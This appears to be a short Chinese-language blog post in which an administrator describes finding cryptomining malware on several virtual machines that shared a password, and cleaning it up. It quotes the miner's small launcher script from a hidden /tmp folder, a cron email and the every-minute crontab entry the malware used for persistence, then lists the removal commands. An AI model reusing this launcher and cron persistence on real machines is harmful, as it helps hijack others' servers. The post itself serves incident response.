服务器CPU占用100%,一看进程名为bash的占用的。几个相同密码的虚拟机都遭了。
查了下,是被用来挖矿了,囧。
[root@localhost ~]# cat /tmp/.bash/bash #!/bin/bash cd -- /tmp/.bash mkdir -- .bash cp -f -- x86_64 .bash/bash ./.bash/bash -c rm -rf .bash
发现就是这个脚本在不停的执行
From root@localhost.localdomain Sun Nov 15 21:32:02 2020
Return-Path: <root@localhost.localdomain>
X-Original-To: root
Delivered-To: root@localhost.localdomain
Received: by localhost.localdomain (Postfix, from userid 0)
id 86AB4404DBE9; Sun, 15 Nov 2020 21:32:02 +0800 (CST)
From: "(Cron Daemon)" <root@localhost.localdomain>
To: root@localhost.localdomain
Subject: Cron <root@localhost> /tmp/.bash/bash
Content-Type: text/plain; charset=UTF-8
Auto-Submitted: auto-generated
Precedence: bulk
X-Cron-Env: <XDG_SESSION_ID=1498>
X-Cron-Env: <XDG_RUNTIME_DIR=/run/user/0>
X-Cron-Env: <LANG=zh_CN.UTF-8>
X-Cron-Env: <SHELL=/bin/sh>
X-Cron-Env: <HOME=/root>
X-Cron-Env: <PATH=/usr/bin:/bin>
X-Cron-Env: <LOGNAME=root>
X-Cron-Env: <USER=root>
Message-Id: <20201115133202.86AB4404DBE9@localhost.localdomain>
Date: Sun, 15 Nov 2020 21:32:02 +0800 (CST)
|| ERROR || already running...
删除/tmp/.bash文件夹过后,发现email还在发
ls /tmp/.bash/ bash i686 x86_64
rm -rf /tmp/.bash
查看计划任务
[root@localhost ~]# crontab -l * * * * * /tmp/.bash/bash [root@localhost ~]# crontab -e * * * * * /tmp/.bash/bash ##删除
先把它干掉。
删除以下文件:
rm -rf /tmp/.xm/stak/ld-linux-x86-64.so.2
rm -rf /sbin/upd rm -rf /sbin/initct1 rm -rf /sbin/mke3fs rm -rf /sbin/s1n rm -rf /sbin/ld-linux-x86-64.so.2 rm -rf /sbin/libpthread.so.1
修改密码,最好改下SSH端口。